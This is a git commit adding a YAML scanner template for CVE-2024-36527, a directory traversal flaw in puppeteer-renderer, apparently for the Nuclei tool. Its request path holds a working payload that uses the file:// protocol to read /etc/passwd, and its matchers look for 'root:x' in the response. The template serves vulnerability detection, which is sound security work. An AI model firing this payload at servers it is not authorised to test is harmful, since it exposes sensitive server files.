Added template for CVE-2024-36527

patch-4
César Calderón 1970-01-01 00:00:00 +00:00
parent 07b11880fb
commit 18be56ef05
1 changed files with 26 additions and 0 deletions

26
CVE-2024-36527.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2024-36527
info:
name: Puppeteer-renderer Directory Traversal
author: Stux
severity: medium
description: |
puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
reference:
- https://github.com/zenato/puppeteer-renderer/issues/97
metadata:
max-request: 1
tags: cve,cve2024,puppeteer-renderer
http:
- method: GET
path:
- "{{BaseURL}}/html?url=file:///etc/passwd"
matchers:
- type: word
words:
- "root:x"
- "/bin/bash"
part: body
condition: or